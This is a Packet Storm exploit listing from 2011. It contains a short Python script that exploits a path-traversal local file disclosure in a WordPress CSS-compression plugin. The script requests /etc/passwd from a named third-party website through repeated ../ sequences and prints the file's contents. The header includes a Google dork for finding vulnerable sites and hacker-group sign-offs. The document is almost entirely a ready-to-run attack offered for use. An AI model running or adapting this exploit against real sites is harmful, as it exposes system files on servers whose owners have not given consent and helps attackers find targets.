WordPress Yoast 4.1.3 Local File Disclosure

2011-08-26T00:00:00
ID PACKETSTORM:104467
Type packetstorm
Reporter Angel Injection
Modified 2011-08-26T00:00:00

Description

                                        
                                            `#!/bin/python  
  
print "###########################################################################"  
print "# Exploit Title:WordPress Yoast v4.1.3 Local File Disclosure Vulnerability#"  
print "# Author:Angel Injection #"  
print "# Home Page: http://dev-point.com http://sec-krb.org #"  
print "# Exploit find By H7acker110 #"  
print "# python exploit find By Miroslav Stampar #"  
print "# Note:Iam Angel Injection From the country of civilizations(iraq) #"  
print "# Google Dork:inurl:wp-css-compress.php?f= #"  
print "###########################################################################"  
  
  
  
import urllib2  
  
FILEPATH = "/etc/passwd"  
  
req = urllib2.urlopen("http://profitseo.com/wp-content/plugins/wp-css/wp-css-compress.php?f=../../../../../../../../../../%s" % FILEPATH)  
  
print "Filepath: '%s'" % FILEPATH  
print "Content: %s" % repr(req.read())  
  
  
  
#############################  
print "Exploit Completed"  
#############################  
print "Inj3ct0r Team 4 ever"  
#############################  
  
  
`